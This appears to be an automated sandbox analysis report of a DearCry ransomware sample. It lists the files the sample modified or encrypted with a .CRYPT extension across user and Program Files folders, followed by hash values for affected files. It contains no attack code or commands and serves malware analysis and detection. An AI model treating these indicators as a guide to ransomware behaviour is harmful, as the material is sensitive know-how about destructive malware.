| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VUPQHL12\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Purble Place\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Ringtones\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Chess\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\TWVGEE8A\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\Sample Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Hearts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SX809FAK\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Solitaire\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\gadget.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EVRGREEN\THMBNAIL.PNG.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoCanary.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-utilities.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\clock.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_m.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\settings.html | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\VC\msdia90.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CATALOG.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationUp_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\perfcore.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\1033\xlsrvintl.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\css\flyout.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libspeex_resampler_plugin.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_foggy.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Thatch.xml.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME22.CSS | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\MSOSTYLE.DLL | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\defaults\pref\channel-prefs.js.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_h.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGCHKBRD.XML.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\fr-FR\cpu.html | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\cpu.html | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIconsMask.bmp.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\de\PresentationFramework.resources.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\freebl3.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\notification_helper.exe | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\jre\bin\javafx-font.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_pressed.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\settings.html | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\DiagnosticsHub.DataWarehouse.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\plugins\video_filter\libblendbench_plugin.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHigh.jpg.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\api-ms-win-crt-process-l1-1-0.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\css\clock.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03012U.BMP.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue.css.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Push\1047_576black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\bin\management.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Mahjong\Mahjong.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME23.CSS | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CONTACT.JPG.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\picturePuzzle.html | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\com.jrockit.mc.console.ui.notification_contexts.xml.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\css\main.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\gadget.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\PROPLUS\SETUP.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMaskRTL.bmp.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\wlsrvc.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSSP7ES.DLL.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Stationery\1033\NOTEBOOK.HTM.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\LOCALDV.DLL.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FORM.JS.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\es\Microsoft.Build.Utilities.v3.5.resources.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationUp_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Main_Background_Loading.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\css\settings.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe"
Network
Files
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml
| MD5 | 0f96cefe93c14e6adece5ea787d35fb5 |
| SHA1 | 3dfb1f74beab2ed12f2de06c0410e569058cb693 |
| SHA256 | 748f3778ee8e6d99b6e2ad300c320383c83bc004e6b6cde2b89e522cf7143630 |
| SHA512 | 6daba5b8440d657fb6fbf26d7c1fc276ae6511557f376c1b60f10b93e5978f5d3b2e610dd39ad298d7f78d78c31f048e818b6c3b2f195e5be903b65b9424fc29 |
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png
| MD5 | 9a530c475ef73c5896d7c7f3543b1d97 |
| SHA1 | bc80f3430254af79f06be0d37d71cca604fccae9 |
| SHA256 | 318cebc3c59b5327cfb7a69507f1dcbe92a15fc1abe429bf2359e0f9664d0b2d |
| SHA512 | dc2da4492cbb7358ebddfacc246ff4bfc3a8b2fb3e76f47519a7e6ae47fce293607ab6980e64c0a5d4bd2687b2584fe6f4d85bb4888a11760aeb0d94e8246a1b |
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml
| MD5 | 794eb220b9c3fc6775b08dd9425c24b0 |
| SHA1 | 99daf8158bd4914c06fc33302eec1d7f5897aa93 |
| SHA256 | 40aa257d744c7d904e8f62392c91389cff523bae86eac46f075f79f6b67534b0 |
| SHA512 | c8d1f7bb4ddcd2c5c212eea495d776cda2fd1cc1d22e81c885bc45dfaca878b02810a0998c40ff861a8c78d52e7718444e046562c1e792590d881a1bb336ba86 |
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-util-enumerations.xml
| MD5 | 0dbdc71d198cd2da4d8c5c38f44e66a2 |
| SHA1 | dab7e173502d5f80bc3177b0a480561b208eb1d0 |
| SHA256 | 5ad2dac3e0044649be6532c957950483092115cf2992d170a98a123cc0af2818 |
| SHA512 | 28506aced7d9235e3ed73e2afacc54834295818b571a7633ce8a72e8dbdd0debd225dfc307e10d82a082dac0da757a8ab6eaf5cea6b671fde4d03ead14d86b29 |
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-spi-quicksearch.xml
| MD5 | 484651b39b9f0fc3ed8153db82b39eed |
| SHA1 | 859b44bdf204a55d21755358180adc62ede0e93f |
| SHA256 | 87bc15638540621224fcbd0f2fd0a73267465418b9b2897ea2fe5b977b990c35 |
| SHA512 | aac187baafb492a6930cebd87c41e67434bc40b724a844f3684f28b18846d01efc7f85e5fd0a017f1aceae341b616d2d925ec740039b17f01a9db1223972306a |
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-ui.xml
| MD5 | 241e2f8d1c6df84c7de7debff798313c |
| SHA1 | 8d2f93801f8b0116fe159123faaf09d607eb1d19 |
| SHA256 | 00fca714016de5a5b3207fb94fc30211cf745fd4b03c120862ffd88b5f024192 |
| SHA512 | 11b376dc95d904b38bc541c26078b13843d632016e3b3bce3ff8d6315bf90d97b993d56fd76802e96bb87a3dbe1de3ebe92836d48aa35b2974785e9f69957e20 |
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml
| MD5 | b8e825d92d653fcf8f7dfb029406156b |
| SHA1 | 521f90b3653ee90e5b7b21a4732c7a8e2b2d9a92 |
| SHA256 | e9466955f535446cc4999e58805089c19bdd2cfc347519c912758cfc09e2564e |
| SHA512 | 059141bdc1e074bbbf7d43718ed5cb5ed2e4d663315f8433eb204ab083e6f9b43c4e84aec556cc190d59cd2dc1daa38343750cc18e45767de435230ecb1eaf28 |
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sa.xml
| MD5 | 626282b09a4ad2e3debc34b0f723eab4 |
| SHA1 | 2d6030babe784d001777aab4153415d991534689 |
| SHA256 | 17a950101ceb4026932f7ff1902aabe83d835584d89081db151d72709333aeaa |
| SHA512 | 779e64f8a33388b0fe4c0627e9dc2b706b9d13ba3d54594bbe062d22f6ed1f04128ae3f0dbb32649052f1dd1e0aabf1c70b4db5a73816706753508a791dec428 |
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-threaddump.xml
| MD5 | 4e7c2b21080a655a39e47bd0e9949c43 |
| SHA1 | 9b0e102fa821e1f48cdc31c533bccc5eebd4a54e |
| SHA256 | b366b83f2732e1e45a454bcb03aaa49ba21b9b05e122a8adc88858fe540aef21 |
| SHA512 | 1e5f51a49c3b56c22d8191dfccf8d53f24247870155c5e2864617d25d0bb4e3837a3927e7d1a056230b0eca0488e1c257c88f72da7c8ac962ae7482eb5d973a9 |
C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\OfficeMUISet.XML
| MD5 | fb7745147a1e73eb393f50685ed0307e |
| SHA1 | 0bbcb4de1fd8f558dca370e149af99388ca6021d |
| SHA256 | 36c960255b56d99527c46d829df70f2df299344a6c91ea0df037502310275ccf |
| SHA512 | 95cee37c3492fef7d3e531f6bd265ee675f426f2ae756b10936e4f9c47ab2208bdc05fc7ec8d33c94aa17f585eab71c23f1e0e86fa46085eca7247a77f87eeef |
C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Module.xml
| MD5 | 516e13b880044e4e84825e930da9e6ae |
| SHA1 | 680014911828b15dab0684b553dd0fbb0975f79c |
| SHA256 | f59de0da569599483a5aae0f0c4f2d2c10d97576c261f15235fb3b880a12463b |
| SHA512 | 1e49c1e00206b85e61ac038aedadf43084a7406796e09f5d31130bf9be8f25fb68e96fff049cb81e3d593833d38b9b7409efe7e7550760c12ceb7ac6ea41ee65 |
C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Hardcover.xml
| MD5 | 7e1c1eb317e359233365bd065bb5f9dc |
| SHA1 | c887b29d543207b7677f53b9fb605750223456c1 |
| SHA256 | 8d3f2dab5a480547e1f49f8ce3d9d876da1428527a472b58caba6f6b76962305 |
| SHA512 | d37b150d1e97a0ad62163af5082567900cc24a62d4e425e4ed44787d9fb195168666534df17a602d8214bc05c78ae58fb76cc9a255cfcbb544db51978ea882b7 |
C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Technic.xml
| MD5 | 372e32c507fb0c4050e561d31f013b85 |
| SHA1 | 2d9a6839875d126b9ae008f91b6c8031da6fddba |
| SHA256 | bc10dcc05f8cf25e4bd058724739fcd1d43270c26be23642d9d3b159990d7cc2 |
| SHA512 | 35664e1ac284308f7a826a2b230a9603595011f74e3440424344e4bcaaf1a4ae3726b4c378bcfadc5a6e85aeb6802948517f29d7375771666a3a1a38726e6dca |
C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Urban.xml
| MD5 | 09ddfc512856bcb18938b61214b6983a |
| SHA1 | e61c11bfb814f6d49bcd42df0713e54df25215fb |
| SHA256 | 43de088d9626ed9eab5827f7149283986e6ca82ac1aac350c7e51764e256f696 |
| SHA512 | 9f445aac5388548f329d2cfb96d3f29b282599d34722502f1774e1fff7758981622847653b14330a642a4458710e69e706ab83972567f9436cb40eb449137ec0 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImageMask.bmp
| MD5 | cb3156c7903e0763a5d5f7b2298e833a |
| SHA1 | 0e8de3ba01ea0d2a10f6e706232b509901ce8506 |
| SHA256 | 27ea5deef122c356c6cf0758cedfb350c0f5a645afeb2e171dedcf7c46de3af2 |
| SHA512 | df4467362eff7a1aff1e4074e2e3076365c3d1cdc211c06d40a6af2ad012a899cede7cb79a4f1d541040df4adc285b1419ea756ed082502bd0190e0e421a4cc8 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIconsMask.bmp
| MD5 | bbf2d0e9eea1bc1e7c868ed7b1283958 |
| SHA1 | c2ab0419d8e59e56f5d36d66e10adbe8c7f79039 |
